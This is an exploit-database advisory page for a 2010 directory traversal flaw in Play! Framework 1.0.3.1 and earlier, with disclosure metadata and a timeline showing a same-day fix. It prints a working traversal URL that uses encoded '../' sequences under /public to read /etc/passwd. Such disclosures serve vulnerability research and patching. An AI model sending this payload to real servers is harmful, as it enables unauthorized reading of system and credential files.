Play! Framework - exploit.company

vendor:

Play Framework

by:

kripthor

7,5

CVSS

HIGH

Directory Transversal

CWE

Product Name: Play Framework

Affected Version From: Play! Framework <= 1.0.3.1

Affected Version To: Play! Framework <= 1.0.3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:playframework:play_framework

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 10

2010

Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability

An attacker can download any file that the owner of the Play! process can read by simply browsing to http://127.0.0.1:9000/public/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd. The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file, typically an images or css directory on the server.

Mitigation:

Ensure that the '/public' directory is not accessible to attackers.

Source

Exploit-DB raw data:

Exploit Title:     Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability
Date:              July 24, 2010
Author:            kripthor
Software Link:     http://www.playframework.org/
Version:           Play! Framework <= 1.0.3.1
Tested on:         Ubuntu 10 
CVE :              N/A
Notes:             28/07/2010 at 14:03 - Developer contacted
                   28/07/2010 at 15:04 - Fix released
                   10/08/2010 at 17:00 - Exploit published
References: 	   www.playframework.com


An attacker can download any file that the owner of the Play! process can read.

Simply browse to:

http://127.0.0.1:9000/public/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file. 
Typically an images or css directory on the server.